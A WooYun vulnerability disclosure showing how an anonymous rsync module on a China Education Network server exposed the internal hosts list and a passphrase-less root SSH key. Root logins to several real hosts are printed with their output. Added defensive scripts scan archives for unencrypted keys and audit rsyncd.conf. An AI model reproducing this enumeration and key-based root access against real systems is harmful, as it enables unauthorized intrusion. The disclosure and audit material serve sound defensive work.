
Vulnerability Summary

Defect ID: wooyun-2013-041184

Title: China Education Network (eol.cn) system misconfiguration leads to full-site compromise

Vendor: 中国教育网 (China Education Network)

Author: 盈盈无绪

Submitted: 2013-10-27 15:12

Fix deadline: 2013-12-11 15:13

Published: 2013-12-11 15:13

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2013-10-27: Vendor being contacted and report awaiting vendor acknowledgement; details withheld from the public
2013-12-11: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A single misconfigured service (an rsync daemon module on 211.151.94.241 that can be read without any credentials) led to the compromise of the entire China Education Network (www.eol.cn) server estate.

Detailed Description:

Listing the rsync module exposed by the daemon on 211.151.94.241 (no credentials required):

rsync 211.151.94.241::gen/


cat hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost
202.205.109.141 debian141.eol.cn debian141
# The following lines are desirable for IPv6 capable hosts
# ::1 ip6-localhost ip6-loopback
# fe00::0 ip6-localnet
# ff00::0 ip6-mcastprefix
# ff02::1 ip6-allnodes
# ff02::2 ip6-allrouters
# ff02::3 ip6-allhosts
#
# 211.151.91.98 ipvs2
#
166.111.204.69 wowowo
172.16.0.1 switch-01
172.16.0.2 switch-02
172.16.0.3 switch-03
172.16.1.4 switch-04
202.112.0.36 kiwi
67.228.174.9 cucas
#202.205.109.1 rhea
202.205.109.2 www.eol.cn
202.205.109.3 bbs
202.205.109.4 db2.eol.cn
202.205.109.5 jacana
202.205.109.6 butterfly db2
#202.205.109.7 db1
#202.205.109.8 bull
202.205.109.8 crane
202.205.109.9 ibis
202.205.109.10 centra-2
202.205.109.11 donkey2
202.205.109.12 centra
202.205.109.14 home
202.205.109.15 deepblue
202.205.109.17 Ian
202.205.109.18 thorpe
202.205.109.19 blue
202.205.109.20 blog.edu.cn
202.205.109.21 caps-2
202.205.109.22 home2
202.205.109.23 bluebird
202.205.109.24 ceaie.edu.cn blog-2
202.205.109.25 egret
202.205.109.26 thorpe-2
202.205.109.27 blog
202.205.109.28 gaokao4
202.205.109.34 ad01
202.205.109.35 ad02
202.205.109.37 caps
202.205.109.38 ftp snoopy
#202.205.109.45 hehe
202.205.109.46 gaokao4
202.205.109.47 home-limo
202.205.109.48 eolftp
202.205.109.50 node14
202.205.109.51 eagle
202.205.109.52 crane
202.205.109.53 emu
202.205.109.54 donkey
202.205.109.55 bittern
202.205.109.56 pause
202.205.109.57 egret-2
202.205.109.58 kookaburra
202.205.109.59 macaw
202.205.109.69 db1
202.205.109.80 bigip
202.205.109.97 honeyyeater
202.205.109.98 jay
202.205.109.99 preview.eol.cn
202.205.109.100 flamingo
202.205.109.101 flamingo-2
202.205.109.102 preview.eol.cn
202.205.109.103 flycatcher
202.205.109.104 falcon
202.205.109.110 goose
202.205.109.111 hawk
202.205.109.112 heron
202.205.109.117 dove
202.205.109.118 e2900-1
202.205.109.119 e2900-2
202.205.109.120 v240-1
202.205.109.121 v240-2
202.205.109.123 hummingbird
202.205.109.124 hornbill
202.205.109.125 bluelog
202.205.109.127 boatbill
202.205.109.150 bull
202.205.109.155 lion
202.205.109.178 rhea
202.205.109.184 merganser
202.205.109.190 marabou
202.205.109.191 mallard
202.205.109.193 motmot
202.205.109.195 philomela
202.205.109.209 msu
202.205.11.9 break dns2
202.205.11.42 giraffe
202.205.11.43 snake
202.205.11.69 green
202.205.11.70 cyan
202.205.11.71 kingfisher
202.205.11.72 kingfisher-2
202.205.176.34 moeweb1
202.108.198.242 cvae
202.205.7.57 gsy.idc
202.205.7.58 idcmonitor
211.151.91.97 Ian2
211.151.91.98 ipvs2
211.151.91.101 ipvs1
211.151.91.102 alt2
211.151.91.103 gaokao2
211.151.91.104 bbs2
#211.151.91.105 photo
211.157.99.55 photonew
202.205.109.210 photo
211.151.91.107 free.eol.cn-2
211.151.91.108 www.eol.cn-2
#chisa.edu.cn
211.151.90.1 media
211.151.90.2 media
211.151.90.3 chisaiflow
211.151.90.4 fangtan
211.151.90.5 realserver
211.151.89.145 chisachat
211.151.89.185 chisa-db
211.151.89.188 magpie
202.112.35.245 hehe
211.142.41.140 dtmy


Among the files in the module is an SSH key archive (ssh2.tgz):

164713 10 27 14:01 ssh2.tgz


Unpacking it gives an unprotected key pair:

id_rsa		id_rsa.pub


Pick one of the servers from the hosts file above and log in as root with the key:

ssh -i id_rsa root@211.151.91.104
ipvs2:~# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 2007 ? 00:03:51 init [2]
root 2 1 0 2007 ? 00:04:34 [migration/0]
root 3 1 0 2007 ? 00:01:14 [ksoftirqd/0]
root 4 1 0 2007 ? 00:04:25 [migration/1]
ipvs2:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:C0:9F:38:C1:95
inet addr:211.151.91.98 Bcast:211.151.91.111 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1915675700 errors:5 dropped:144 overruns:0 frame:3
TX packets:3921889199 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2378780214 (2.2 GiB) TX bytes:1560078143 (1.4 GiB)
Base address:0xe400 Memory:febc0000-febe0000
eth1 Link encap:Ethernet HWaddr 00:C0:9F:38:C1:96
inet addr:10.0.0.98 Bcast:10.0.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:495776699 errors:0 dropped:180 overruns:0 frame:0
TX packets:3661157267 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:849113923 (809.7 MiB) TX bytes:1267393581 (1.1 GiB)
Base address:0xe000 Memory:feba0000-febc0000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:196550863 errors:0 dropped:0 overruns:0 frame:0
TX packets:196550863 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:117126749 (111.7 MiB) TX bytes:117126749 (111.7 MiB)
history | grep ssh
5 ssh 10.0.0.39
6 ssh 10.0.0.43
8 ssh 10.0.0.43
10 ssh 10.0.0.39
11 ssh 10.0.0.43
12 ssh 10.0.0.39
14 ssh 10.0.0.43
ssh 10.0.0.39
Last login: Sun Sep 29 11:17:10 2013 from 10.0.0.98
Linux cockatoo 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cockatoo:~# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 2009 ? 00:07:12 init [2]
root 2 1 0 2009 ? 00:00:00 [migration/0]
root 3 1 0 2009 ? 00:00:10 [ksoftirqd/0]
root 4 1 0 2009 ? 00:01:13 [migration/1]
root 5 1 0 2009 ? 00:01:37 [ksoftirqd/1]
cockatoo:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:35:3C:2B:E4
inet addr:10.0.0.39 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::216:35ff:fe3c:2be4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2782554477 errors:0 dropped:0 overruns:0 frame:0
TX packets:1741093814 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:344340646 (328.3 MiB) TX bytes:86728051 (82.7 MiB)
Interrupt:201
eth0:0 Link encap:Ethernet HWaddr 00:16:35:3C:2B:E4
inet addr:10.0.0.47 Bcast:10.0.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:201
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:36885 errors:0 dropped:0 overruns:0 frame:0
TX packets:36885 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13680105 (13.0 MiB) TX bytes:13680105 (13.0 MiB)
This host has its own rsyncd.conf:
[wcmback]
path = /home/wcmback
comment = Apache2 Config Files
hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 202.205.109.119
[site]
path = /etc/apache2/sites-enabled
comment = Apache2 Config Files
hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25
[teacher]
path = /home/wcm/edu_cn/jiao_shi_zhao_pin_1582
comment = Whole www htdocs
hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[conf]
path = /home/ftp_test/conf
comment = Whole www htdocs
hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[new_files]
path=/home/wcm/new_files
comment = eol wcm files
ignore errors = yes
read only = no
hosts allow = 10.0.0.142/32 10.0.0.143/32
[eol_cn]
path=/home/wcm/eol_cn
comment = eol wcm files
ignore errors = yes
read only = no
hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_images]
path=/home/wcm/new_files/images/cer.net/gaokao/2011shiti
comment = eol wcm files
ignore errors = yes
read only = no
hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_zt]
path=/home/wcm/new_files/zt
comment = eol wcm files
ignore errors = yes
read only = no
hosts allow = 10.0.0.142/32 10.0.0.143/32
cockatoo:/home/wcm# cd eol_cn/
cockatoo:/home/wcm/eol_cn# ls
04_bys_zhao_pin_4407 fudao_10487 lanqiu_11735 te_jian_3992
04_xiaoyuan_cj_1978 fudao_10499 lao_dong_fa_yuan_4385 team_2012
04chun_jie_kuai_xun_1975 fudao_10511 lao_dong_he_tong_9642 teams_5149
04chun_jie_zhuan_ti_1974 fudao_10522 lao_dong_he_tong_jie_chu_zhong_zhi_4391 tebie_ch_4107
05_10_2267 fudao_10533 lao_dong_he_tong_qian_ding_bian_geng_4392 tebie_ch_4520
05_11_2268 fudao_10547 laow_1889 tepjs_4440


Trying yet another machine:

ssh -i i 121.194.3.201
Last login: Sun Oct 27 14:52:07 2013 from 202.205.109.80
Linux xinxi2009-01 2.6.18-6-amd64 #1 SMP Sun Feb 10 17:50:19 UTC 2008 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
xinxi2009-01:~# ifconfig
eth2 Link encap:Ethernet HWaddr 00:23:8B:A9:AA:10
inet addr:121.194.3.201 Bcast:121.194.3.255 Mask:255.255.255.0
inet6 addr: fe80::223:8bff:fea9:aa10/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:11859164102 errors:0 dropped:0 overruns:0 frame:0
TX packets:15624895490 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1655586719825 (1.5 TiB) TX bytes:19411809874839 (17.6 TiB)
Base address:0xac00 Memory:fcde0000-fce00000
eth3 Link encap:Ethernet HWaddr 00:23:8B:A9:AA:11
inet addr:118.186.63.12 Bcast:118.186.63.127 Mask:255.255.255.128
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:98621 errors:0 dropped:0 overruns:0 frame:0
TX packets:27891 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:8199957 (7.8 MiB) TX bytes:18628920 (17.7 MiB)
Base address:0xa800 Memory:fcd80000-fcda0000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:17767291494 errors:0 dropped:0 overruns:0 frame:0
TX packets:17767291494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:43181600100598 (39.2 TiB) TX bytes:43181600100598 (39.2 TiB)
xinxi2009-01:~# id
uid=0(root) gid=0(root) groups=0(root)


The problem is too severe to go any further; stopping here.
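Everything in the chain above hinges on one artefact: a root SSH private key with no passphrase, packed into a backup tarball that an anonymous rsync module served to the whole Internet. The scanner below is an added example (not part of the original report) of the check a defender or an assessor would run over such an archive: it walks a .tar.gz, recognises the PEM, PKCS#8 and OpenSSH private-key containers, and tells passphrase-protected keys from ones usable as-is, reading the cipher name out of the OpenSSH format rather than guessing. The archive it scans is constructed in memory by build_sample_archive() as a stand-in for ssh2.tgz; the key bodies are zero filler, not real key material, and nothing here touches 211.151.94.241.

```python
"""Scan a backup archive for SSH private keys and tell encrypted from passphrase-less ones.

Added example; not part of the original WooYun report. The archive contents are
constructed in build_sample_archive() and stand in for the ssh2.tgz the report
found in the open rsync module; no real key material or network access is involved.
"""
import base64
import io
import re
import struct
import tarfile
from typing import Dict, List, Optional

# Header line shared by OpenSSL-style PEM keys (RSA/DSA/EC), PKCS#8 keys
# (plain or ENCRYPTED) and the newer OpenSSH container format.
KEY_HEADER_RE = re.compile(rb"-----BEGIN (RSA |DSA |EC |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(blob: bytes) -> Optional[str]:
    """Return the cipher name from an 'openssh-key-v1' blob, or None if it is not that format.

    Layout: the magic, then an SSH string (uint32 big-endian length + bytes) naming the
    cipher. A cipher of "none" means the private section is stored in the clear.
    """
    if not blob.startswith(OPENSSH_MAGIC):
        return None
    off = len(OPENSSH_MAGIC)
    if len(blob) < off + 4:
        return None
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n].decode("ascii", "replace")


def classify_key(text: bytes) -> Optional[Dict[str, object]]:
    """Return {'format', 'encrypted'} for a private key file, or None for anything else."""
    m = KEY_HEADER_RE.search(text)
    if not m:
        return None
    kind = (m.group(1) or b"PKCS8 ").decode().strip()
    if kind == "OPENSSH":
        # The base64 body runs from the header to the END line; decode it and read the cipher.
        tail = text[m.end():]
        end = tail.find(b"-----END")
        body = b"".join(tail[:end if end >= 0 else None].split())
        try:
            cipher = openssh_cipher(base64.b64decode(body))
        except ValueError:
            cipher = None
        # A malformed body (cipher None) is reported as unencrypted so it gets looked at.
        encrypted = cipher not in (None, "none")
    elif kind == "ENCRYPTED":
        encrypted = True  # PKCS#8 "BEGIN ENCRYPTED PRIVATE KEY"
    else:
        # Classic PEM keys carry Proc-Type/DEK-Info headers only when passphrase-protected.
        encrypted = b"Proc-Type: 4,ENCRYPTED" in text
    return {"format": kind, "encrypted": encrypted}


def scan_tar(archive: bytes) -> List[Dict[str, object]]:
    """Walk a .tar.gz held in memory and report every member that looks like a private key."""
    findings: List[Dict[str, object]] = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            info = classify_key(tar.extractfile(member).read())
            if info:
                findings.append({"name": member.name, "mode": oct(member.mode & 0o777), **info})
    return findings


def _openssh_pem(cipher: bytes) -> bytes:
    # Constructed: only the magic and the cipher string are laid out as in a real key;
    # the rest of the body is zero filler, so this cannot authenticate anywhere.
    raw = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher + b"\x00" * 32
    b64 = base64.b64encode(raw)
    lines = b"\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + lines + b"\n-----END OPENSSH PRIVATE KEY-----\n"


def build_sample_archive() -> bytes:
    """Constructed stand-in for ssh2.tgz: two usable keys, two locked ones, two non-keys."""
    filler = base64.b64encode(b"\x00" * 48)
    files = {
        "ssh2/id_rsa": b"-----BEGIN RSA PRIVATE KEY-----\n" + filler + b"\n-----END RSA PRIVATE KEY-----\n",
        "ssh2/id_rsa.pub": b"ssh-rsa AAAAB3NzaC1yc2E root@constructed\n",
        "ssh2/id_ed25519": _openssh_pem(b"none"),
        "ssh2/id_ed25519_locked": _openssh_pem(b"aes256-ctr"),
        "ssh2/id_rsa_locked": (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                               b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
                               + filler + b"\n-----END RSA PRIVATE KEY-----\n"),
        "hosts": b"127.0.0.1 localhost\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = 0o600 if name.startswith("ssh2/id_") and not name.endswith(".pub") else 0o644
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_tar(build_sample_archive()):
        state = "ENCRYPTED" if f["encrypted"] else "PASSPHRASE-LESS: usable by anyone holding the archive"
        print(f"{f['name']:<28} {f['format']:<8} {f['mode']:<6} {state}")
```

Run against a real pull from an rsync module (rsync -a host::module ./loot && tar czf loot.tgz loot) the same scan_tar() call tells you in seconds whether the exposure is "some config files" or, as here, root on every host that trusts the key. A key reported as passphrase-less should be treated as already compromised and rotated, not just deleted from the backup.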

Proof of Vulnerability:

(Same material as the detailed description above.)


Fix Recommendation:

Security needs great care: restrict every rsync daemon module with hosts allow and auth users (read-only wherever writes are not required), and never leave private SSH keys, least of all passphrase-less root keys, in backups that a shared service can hand out.

Copyright: please credit 盈盈无绪@乌云 when reposting.
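The one-line recommendation above is the right instinct; concretely, the weakness on this page is rsync daemon modules with no source restriction, no authentication, and in some cases write access. The following Python auditor is an added example, not the author's or the vendor's code: it parses rsyncd.conf's ini-like syntax (including the a.b.c.d/mask form the report's config uses) and flags, per module, the settings that made this compromise possible. SAMPLE_CONF reproduces three of the modules from the cockatoo rsyncd.conf shown earlier and adds a hypothetical [gen] module with no restrictions, standing in for the one on 211.151.94.241 whose real configuration is not in the report.

```python
"""Audit rsyncd.conf modules for anonymous, writable or over-broad exposure.

Added example; not part of the original report. SAMPLE_CONF reproduces three of the
modules shown in the cockatoo rsyncd.conf above and adds a hypothetical [gen] module
standing in for the one on 211.151.94.241 (its real configuration is not in the report).
"""
import ipaddress
from typing import Dict, List, Tuple

SAMPLE_CONF = """\
[wcmback]
path = /home/wcmback
comment = Apache2 Config Files
hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 202.205.109.119
[teacher]
path = /home/wcm/edu_cn/jiao_shi_zhao_pin_1582
comment = Whole www htdocs
hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[new_files]
path=/home/wcm/new_files
comment = eol wcm files
ignore errors = yes
read only = no
hosts allow = 10.0.0.142/32 10.0.0.143/32
# Hypothetical (assumed, not from the report): a module with no restrictions at all,
# which is what an anonymous 'rsync host::gen/' listing implies.
[gen]
path = /home/backup/gen
comment = backups
"""

FALSE_WORDS = {"no", "false", "0"}


def parse_rsyncd_conf(text: str) -> Tuple[Dict[str, str], Dict[str, Dict[str, str]]]:
    """rsyncd.conf is ini-like: '[module]' headers, 'key = value' lines, '#'/';' comments.
    Keys are lowercased so 'Read Only' and 'read only' compare equal."""
    global_settings: Dict[str, str] = {}
    modules: Dict[str, Dict[str, str]] = {}
    current = global_settings
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            current[key.strip().lower()] = value.strip()
    return global_settings, modules


def allowed_networks(spec: str) -> list:
    """Parse a 'hosts allow' value. Address forms become ip_network objects (rsync accepts
    a.b.c.d, a.b.c.d/len and a.b.c.d/mask); other tokens such as hostnames are kept as
    strings so nothing is silently dropped."""
    nets = []
    for token in spec.replace(",", " ").split():
        try:
            nets.append(ipaddress.ip_network(token, strict=False))
        except ValueError:
            nets.append(token)
    return nets


def audit(text: str) -> List[Dict[str, str]]:
    """Return one finding per (module, issue). Module settings override globals, as in rsync."""
    global_settings, modules = parse_rsyncd_conf(text)
    findings: List[Dict[str, str]] = []
    for name, own in modules.items():
        cfg = {**global_settings, **own}
        writable = cfg.get("read only", "yes").lower() in FALSE_WORDS  # rsync default: read only
        hosts = cfg.get("hosts allow")
        issues = []
        if hosts is None:
            issues.append(("NO_HOSTS_ALLOW", "any client that can reach port 873 may use the module"))
        if "auth users" not in cfg:
            issues.append(("NO_AUTH_USERS", "anonymous module; source address is the only control"))
        if writable:
            issues.append(("WRITABLE", "read only = no lets clients push files into " + cfg.get("path", "?")))
        for net in allowed_networks(hosts or ""):
            if isinstance(net, str):
                continue
            if not net.is_private and net.num_addresses > 1:
                issues.append(("PUBLIC_RANGE", f"{net} admits every host in a public range"))
            if writable and net.num_addresses > 1:
                issues.append(("WRITABLE_RANGE", f"writable module open to the whole range {net}"))
        findings.extend({"module": name, "issue": i, "detail": d} for i, d in issues)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CONF):
        print(f"[{f['module']}] {f['issue']}: {f['detail']}")
```

NO_AUTH_USERS fires for every module here because nothing in the report's config uses auth users / secrets file at all; that is the finding that matters most, since a hosts allow of a public /24 (PUBLIC_RANGE) means one compromised neighbour in that range inherits the access, which is exactly the pivot the report demonstrates.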


Vulnerability Response

Vendor response:

The vendor could not be reached, or the vendor actively declined the report.


Vulnerability rating:

Comments

  1. 2013-10-28 07:55 | 雷锋小号 (Passer-by | no vulnerabilities published yet | WooYun is short of people like me who quietly bump threads and never angle for recognition...)

    Front row. I predict this one will blow up.

  2. 2013-10-28 22:04 | 盈盈无绪 (Intern white hat | Rank: 44 | Vulnerabilities: 14 | This person is lazy)

    Could someone help change the vendor to 中国教育在线? That seems to be the account they use here.

  3. 2013-12-11 17:48 | 麻花藤 (Passer-by | Rank: 15 | Vulnerabilities: 1 | ด้้้้้็็็็็้้้้้็็็็...)

    The writeup is a bit long, but the problem is quite serious. And still nobody in the Celestial Empire is dealing with it.